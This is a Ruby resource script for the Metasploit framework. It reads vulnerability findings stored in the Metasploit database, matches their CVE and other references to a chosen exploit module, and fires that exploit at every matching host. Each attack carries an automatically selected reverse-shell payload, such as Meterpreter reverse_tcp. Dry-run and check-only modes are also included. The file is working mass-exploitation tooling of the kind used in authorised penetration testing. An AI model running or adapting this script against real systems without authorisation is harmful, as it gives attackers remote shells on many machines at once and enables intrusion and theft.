# # Print the help function # def help_me help = %Q| Description: This Metasploit RC file can be used to automate the exploitation process. Before using the script, you must import your vulnerability results to Metasploit so that it can deploy the module based on matching references. Three modes are available: exploit/dry/and check. In exploit mode, it will attempt to gain access to all vulnerable hosts with the most suitable reverse shell that's automatically selected. In "dry" mode (dry-run), it'll list all the hosts vulnerable to the exploit. In check mode, it will only trigger the check() function found in the module. If no mode is specified, then it'll default to 'exploit'. Usage: ./msfconsole -r [rc_path] [db_user] [db_pass] [db_workspace] [module_path] [mode] Arguments: rc_path - Full path to the RC script db_user - Username for MSF database (datastore: 'DB_USER') db_pass - Password for MSF database (datastore: 'DB_PASS') db_worksapce - Workspace for the database (datastore: 'DB_WORKSPACE') module_path - Path to the exploit (datastore: 'MODULE') mode - Optional. Accept:exploit/dry/check (datastore: 'MODE') Example of running an exploit: msfconsole -r autoexploit.rc username password msf windows/smb/ms08_067_netapi Authors: sinn3r m-1-k-3 | help = help.gsub(/^\t/, '') print_line(help) end # # Load an exploit # def load_exploit(path) framework.exploits.create(path) end # # See if there is a match for the exploit # def ref_has_match(vuln_refs, exp_refs) # exp_refs is an array of URLs # vuln_refs is a collection of Mdm::Ref, with 'name' being the most useful info # (may contain a link) vuln_refs.each do |ref| n = ref.name n = n.gsub(/^CVE\-/, '') n = n.gsub(/^OSVDB\-/, '') n = n.gsub(/^MSB\-/, '') n = n.gsub(/^EDB-/, '') exp_refs.each { |e| return true if e.to_s =~ /#{n}/ } end return false end # # Automatically select a payload in this order: # Windows meterpreter, linux, osx, php, java, generic # def select_payload(exploit) windows = 'windows/meterpreter/reverse_tcp' linux = 'linux/x86/reverse_tcp' osx = 'osx/x86/shell_reverse_tcp' php = 'php/meterpreter_reverse_tcp' multi = 'java/meterpreter/reverse_tcp' generic = 'generic/shell_reverse_tcp' payloads = [] exploit.compatible_payloads.each do |p| payloads << p[0] end if payloads.include?(windows) return windows elsif payloads.include?(linux) return linux elsif payloads.include?(php) return php elsif payloads.include?(multi) return multi elsif payloads.include?(generic) return generic else # WTF? This exploit supports NONE of our favorite payloads? # What kinda BS is this? return nil end end # # Connect to the database # def init_db(username, password, workspace) if username.empty? or password.empty? raise ArgumentError, "You must have a credential to connect to your database" end print_status("Connecting to database: #{workspace}") run_single("db_connect #{username}:#{password}@localhost:5432/#{workspace}") end # # Exploit mode # def auto_exploit(module_path) exploit = load_exploit(module_path) raise RuntimeError, "Exploit not found: #{module_path}" if exploit.nil? exploit_refs = exploit.references get_payload = select_payload(exploit) lhost = Rex::Socket.source_address('') if get_payload.nil? raise RuntimeError, "No payload selected for this exploit" else print_status("Payload selected: #{get_payload} (lhost=#{lhost})") end framework.db.workspace.vulns.each do |vuln| next if not ref_has_match(vuln.refs, exploit_refs) print_good("Using #{exploit.shortname} against host #{vuln.host.address.to_s}") run_single("use #{exploit.fullname}") run_single("set RHOST #{vuln.host.address.to_s}") run_single("set payload #{get_payload}") run_single("set lhost #{lhost}") run_single("exploit -z") select(nil, nil, nil, 1) run_single("back") end end # # Dry-run mode # def dry_run(module_path) exploit = load_exploit(module_path) raise RuntimeError, "Exploit not found: #{module_path}" if exploit.nil? exploit_refs = exploit.references framework.db.workspace.vulns.each do |vuln| next if not ref_has_match(vuln.refs, exploit_refs) addr = vuln.host.address.to_s print_good("#{addr} has a matching reference to #{exploit.shortname}") end end # # Check mode # def check_exploit(module_path) exploit = load_exploit(module_path) raise RuntimeError, "Exploit not found: #{module_path}" if exploit.nil? exploit_refs = exploit.references framework.db.workspace.vulns.each do |vuln| next if not ref_has_match(vuln.refs, exploit_refs) print_good("Checking #{exploit.shortname} against host #{vuln.host.address.to_s}") run_single("use #{exploit.fullname}") run_single("set RHOST #{vuln.host.address.to_s}") run_single("check") select(nil, nil, nil, 1) run_single("back") print_line() end end # # See if we're already connected # def is_db_connected? begin framework.db.hosts return true rescue ::ActiveRecord::ConnectionNotEstablished return false end end # # Initialize our arguments # def init_args args = {} if ARGV.join('') =~ /^help$/i args[:help] = true return args end datastore = framework.datastore args[:db_user] = ARGV.shift || datastore['DB_USER'] || '' args[:db_pass] = ARGV.shift || datastore['DB_PASS'] || '' args[:db_workspace] = ARGV.shift || datastore['DB_WORKSPACE'] || '' args[:module] = ARGV.shift || datastore['MODULE'] || '' args[:mode] = ARGV.shift || datastore['MODE'] || 'exploit' raise ArgumentError, "Missing a module path" if args[:module].empty? return args end # # Code below serves as our "main" code. # We chose not to wrap it around in a run() function, because if # we do, any "return" will exit msfconsole, and we don't actually want that # to happen. # begin args = init_args if args[:help] help_me return else if not is_db_connected? init_db(args[:db_user], args[:db_pass], args[:db_workspace]) end end case args[:mode] when /^exploit$/i auto_exploit(args[:module]) when /^dry$/i dry_run(args[:module]) when /^check$/i check_exploit(args[:module]) else raise ArgumentError, "Invalid mode" end rescue ArgumentError => e print_error("Invalid argument: #{e.message}") return rescue RuntimeError => e print_error(e.message) return rescue ::Exception => e raise e end